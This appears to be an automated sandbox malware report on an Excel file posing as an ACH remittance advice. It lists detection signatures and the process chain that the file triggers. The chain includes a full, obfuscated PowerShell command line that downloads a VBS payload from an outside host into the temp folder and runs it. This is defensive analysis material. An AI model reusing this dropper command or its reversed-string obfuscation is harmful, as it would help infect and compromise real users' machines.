Windows
Analysis Report
ACH Remittance Advice_CITI25822.xls
Overview
General Information
Detection
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Wscript starts Powershell (via cmd or directly)
Very long command line found
Suspicious powershell command line found
Document contains an embedded macro with GUI obfuscation
Document exploit detected (process start blacklist hit)
Drops VBS files to the startup folder
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Stores large binary data to the registry
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Document contains embedded VBA macros
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Classification
- System is w7x64
- EXCEL.EXE (PID: 2496 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
- wscript.exe (PID: 1212 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sfoWQ.js" MD5: 045451FA238A75305CC26AC982472367)
- powershell.exe (PID: 1496 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapko//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join ''; IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
- wscript.exe (PID: 1156 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\qwe.vbs" MD5: 045451FA238A75305CC26AC982472367)
- powershell.exe (PID: 2888 cmdline:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=( [long binary-encoded command line omitted; truncated in the report]